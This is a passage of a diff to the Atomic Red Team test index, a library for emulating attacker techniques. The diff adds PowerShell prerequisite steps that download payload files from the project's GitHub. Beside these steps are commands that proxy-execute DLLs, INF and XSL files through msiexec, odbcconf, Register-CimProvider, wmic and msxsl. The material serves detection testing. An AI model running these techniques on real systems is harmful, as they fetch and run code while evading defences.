"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -22674,6 +23065,13 @@ execution: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -23189,6 +23587,13 @@ execution: description: PID of process receiving injection type: string default: 1000 + dependency_executor_name: powershell + dependencies: + - description: T1218.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: name: command_prompt elevation_required: true @@ -23224,6 +23629,13 @@ execution: description: DLL to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + dependency_executor_name: powershell + dependencies: + - description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: name: command_prompt command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} @@ -23240,6 +23652,11 @@ execution: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi + dependency_executor_name: powershell + dependencies: + - description: T1218.msi must exist on disk at specified location (#{msi_payload}) + prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}' + get_prereq_command: Write-Host "You must provide your own MSI" executor: name: command_prompt command: 'msiexec.exe /q /i "#{msi_payload}" @@ -23274,6 +23691,13 @@ execution: description: DLL to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + dependency_executor_name: powershell + dependencies: + - description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: name: command_prompt command: 'msiexec.exe /y "#{dll_payload}" @@ -23290,6 +23714,13 @@ execution: description: DLL to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + dependency_executor_name: powershell + dependencies: + - description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: name: command_prompt command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} @@ -23307,6 +23738,13 @@ execution: description: Local location of inf file type: string default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -23766,6 +24204,13 @@ execution: description: Location of the project file type: Path default: PathToAtomicsFolder\T1127\src\T1127.csproj + dependency_executor_name: powershell + dependencies: + - description: Project file must exist on disk at specified location (#{filename}) + prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#{filename}" executor: name: command_prompt elevation_required: false @@ -24384,6 +24829,18 @@ execution: description: Location of the test XSL script file on the local filesystem. type: Path default: PathToAtomicsFolder\T1220\src\msxslscript.xsl + dependency_executor_name: powershell + dependencies: + - description: XML file must exist on disk at specified location (#{xmlfile}) + prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" + - description: XSL file must exist on disk at specified location (#{xslfile}) + prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" executor: name: command_prompt command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} @@ -24427,6 +24884,13 @@ execution: description: Location of the test XSL script file on the local filesystem. type: path default: PathToAtomicsFolder\T1220\src\wmicscript.xsl + dependency_executor_name: powershell + dependencies: + - description: XSL file must exist on disk at specified location (#{local_xsl_file}) + prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: name: command_prompt command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}